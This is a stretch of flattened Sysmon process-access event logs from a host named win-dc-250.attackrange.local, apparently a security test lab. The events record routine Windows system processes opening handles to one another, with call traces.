13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-44E1-6000-2801-000000009A01}3088C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4288-6000-1000-000000009A01}11362140C:\Windows\system32\svchost.exe{08A6967A-44E1-6000-2801-000000009A01}3088C:\Windows\system32\usoclient.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|c:\windows\system32\UBPM.dll+a711|c:\windows\system32\UBPM.dll+f974|c:\windows\system32\UBPM.dll+cd3c|c:\windows\system32\UBPM.dll+d305|c:\windows\system32\UBPM.dll+dc05|c:\windows\system32\UBPM.dll+e91d|c:\windows\system32\UBPM.dll+e12a|c:\windows\system32\UBPM.dll+dd82|c:\windows\system32\EventAggregation.dll+3e22|c:\windows\system32\EventAggregation.dll+389a|c:\windows\system32\EventAggregation.dll+332f|c:\windows\system32\EventAggregation.dll+2e28|C:\Windows\SYSTEM32\ntdll.dll+65b65|C:\Windows\SYSTEM32\ntdll.dll+6586d|C:\Windows\SYSTEM32\ntdll.dll+656d0|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005174Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005173Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005172Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005171Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005170Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005169Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005168Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005167Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005166Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005165Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005164Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.529{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005163Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.029{08A6967A-4288-6000-1000-000000009A01}11364968C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005162Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:29.029{08A6967A-4288-6000-1000-000000009A01}11364968C:\Windows\system32\svchost.exe{08A6967A-4298-6000-3300-000000009A01}2812C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:30.279{08A6967A-44E2-6000-2F01-000000009A01}41924056C:\Windows\system32\conhost.exe{08A6967A-44E2-6000-3201-000000009A01}2220C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 